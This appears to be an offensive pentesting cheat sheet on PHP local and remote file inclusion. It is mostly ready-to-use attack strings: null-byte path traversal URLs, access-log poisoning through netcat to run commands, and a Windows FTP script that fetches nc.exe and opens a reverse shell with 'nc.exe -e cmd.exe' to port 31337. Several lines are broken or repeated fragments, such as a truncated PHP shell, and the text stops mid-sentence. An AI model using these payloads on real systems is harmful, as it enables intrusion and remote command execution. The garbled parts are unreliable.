Local File Inclusion ==================== The %00 make php 5.3 and below ignore everything after that. Testing: http://192.168.1.1/addguestbook.php?name=dfjfgjhytry&comment=&LANG=en../../../../../windows/system32/drivers/etc/hosts%00 ...then let's add code to the access log :) ~# nc 192.168.1.1 80 ...and use it http://192.168.1.1/addguestbook.php?name=dfjfgjhytry&comment=&cmd=ipconfig&LANG=en../../../../../../xampp/apache/logs/access.log%00 ...or php shell on linux:) &3 2>&3");?> ...finally send the requests to nc and exploit: # Windows FTP upload echo open 192.168.1.1 21 > ftp.txt && echo haxy>> ftp.txt && echo haxy >> ftp.txt && echo bin >> ftp.txt && echo GET nc.exe >> ftp.txt && echo bye >> ftp.txt && ftp -s:ftp.txt nc.exe -e cmd.exe 192.168.1.1  31337 - - - - - - - -  ftp.txt'); ?> > ftp.txt'); ?> > ftp.txt'); ?> > ftp.txt'); ?> > ftp.txt'); ?> > ftp.txt'); ?> Remote file Inclusion ===================== Example: http://192.168.1.1/add.php?name=asdasd&LANG=http://192.168.1.1/login.txt%00 Note: the login.txt contains